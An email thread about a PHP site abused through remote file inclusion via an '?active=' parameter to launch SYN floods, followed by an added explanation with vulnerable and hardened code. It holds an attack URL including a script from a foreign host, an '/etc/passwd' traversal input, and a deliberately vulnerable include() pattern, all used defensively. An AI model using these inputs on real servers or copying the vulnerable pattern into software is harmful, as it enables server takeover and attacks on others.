>Diana Saunders wrote:
>>I started a thread last week regarding trying to block some IPs that I
>>thought were sending a syn flood on my server. The suggested action (IP
>>Tables) didn't seem to help.
>>
>>It turns out the problem was a little different than I expected and I
>>wanted to let everyone know exactly what was happening.
>>
>>What someone was doing was running the following URLs on one of the server's
>>sites:
>>
>>http://www.domainname.com/index.php?active=http://www.someotherdomain.com/filename.gif
>>
>>
>>But filename.gif is not a gif, it is a text file with a script that sends
>>a synflood to some other server.
>>
>>The ?active= part of the URL is the way the site was set up for
>>navigation. Although I design in PHP a lot, I haven't run across this
>>particular navigation set up. But in any event, it obviously opens the
>>site to the kind of exploiting behavior it was getting. I'm assuming
>>some design software set the navigation up this way and that once this is
>>taken out there shouldn't be a problem.
>>
>>Has anyone else run across this?
>
>Yep, a couple of times.
>
>Looks like they have used a phpupload script to plant a file on your
>server. All it then takes is a few infected PCs to target that file and
>launch the flood.
>
>Or in our case, loads of emails claiming to be from "voxcards.com.br"
>
>We eventually installed mod_security onto our servers in order to prevent a
>lot of this rubbish from occurring. (www.gotroot.com) - the rules it uses
>are quite good at blocking the phpupload attempts, although you will get
>some false positives.
>
>
>Check your /tmp and /dev/shm for any other hidden surprises. If you have
>chkrootkit or rkhunter installed, it might be a good idea to run that too.
Paul,
Actually, this isn't an upload issue. That's what makes it different. I've
dealt with uploads and tmp folder issues in the past. This server has safe
mode enabled anyway. In this case they are simply running a URL that is
pulling a script into the browser from a completely foreign web site. I
think the vulnerability is in the way the navigation is coded on the web
site, allowing people to pull in other pages as if they were part of the web
site. I know hackers use PHP to run commands on the server, but usually
they can't get very far if they can't run wget or upload anything.
Di
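What Di describes is a remote file inclusion: the navigation code hands the raw `?active=` value to `include`, and with `allow_url_fopen` enabled (PHP 4 and early PHP 5 defaults) PHP fetches a URL given there and executes whatever PHP code the remote file contains, `.gif` extension or not. The snippet below is an added example, not code from this thread or from the site in question; the page names, the `pages/` directory and the `resolve_page` helper are assumptions for illustration. It shows the vulnerable pattern beside an allowlist replacement that maps the request value to a fixed set of local files.

```php
<?php
// Added example (not from the thread). Illustrates the ?active= navigation
// pattern and an allowlist fix. Page names and paths are assumptions.

// VULNERABLE: the query value is the include target. A request such as
// index.php?active=http://www.someotherdomain.com/filename.gif makes PHP
// download filename.gif and run the PHP code inside it on this server
// (when allow_url_fopen / allow_url_include permit URLs). A value like
// ../../../../etc/passwd reads local files the same way.
function vulnerable_nav(array $get): void
{
    $page = isset($get['active']) ? $get['active'] : 'home.php';
    include $page;   // attacker controls what gets included
}

// HARDENED: the request value is only a key into a fixed map of local
// pages. Anything not in the map falls back to the default; the input is
// never used to build a path.
function resolve_page(array $get, array $allowed, string $default = 'home'): string
{
    $key = isset($get['active']) ? (string) $get['active'] : $default;
    if (!array_key_exists($key, $allowed)) {
        $key = $default;
    }
    return $allowed[$key];
}

// Assumed page map for the demo.
$pages = [
    'home'    => __DIR__ . '/pages/home.php',
    'about'   => __DIR__ . '/pages/about.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

// Constructed requests: a normal one, the remote-include attempt from the
// thread, a directory-traversal attempt, and a request with no parameter.
$requests = [
    ['active' => 'about'],
    ['active' => 'http://www.someotherdomain.com/filename.gif'],
    ['active' => '../../../../etc/passwd'],
    [],
];

foreach ($requests as $req) {
    $shown = isset($req['active']) ? $req['active'] : '(none)';
    echo str_pad($shown, 50) . ' -> ' . resolve_page($req, $pages) . "\n";
}
// Only 'about' resolves to pages/about.php; the other three all land on
// pages/home.php, so the remote file is never fetched or executed.
```

Two caveats a practitioner will want alongside the fix: `safe_mode` does not restrict `include` of a URL, so the `php.ini` settings that actually matter are `allow_url_fopen = Off` (PHP 4/5) and, from PHP 5.2 onward, `allow_url_include = Off`, which blocks URL includes even where `allow_url_fopen` stays on for other uses. Since the included script ran as the web server user, its outbound flood traffic shows up in the server's own connection table, which is why blocking the requesters' source IPs with iptables did not stop it; the fix is in the application, and until it is deployed a rule rejecting requests whose `active` value begins with `http://` or `https://` (for example in mod_security) is a reasonable stopgap.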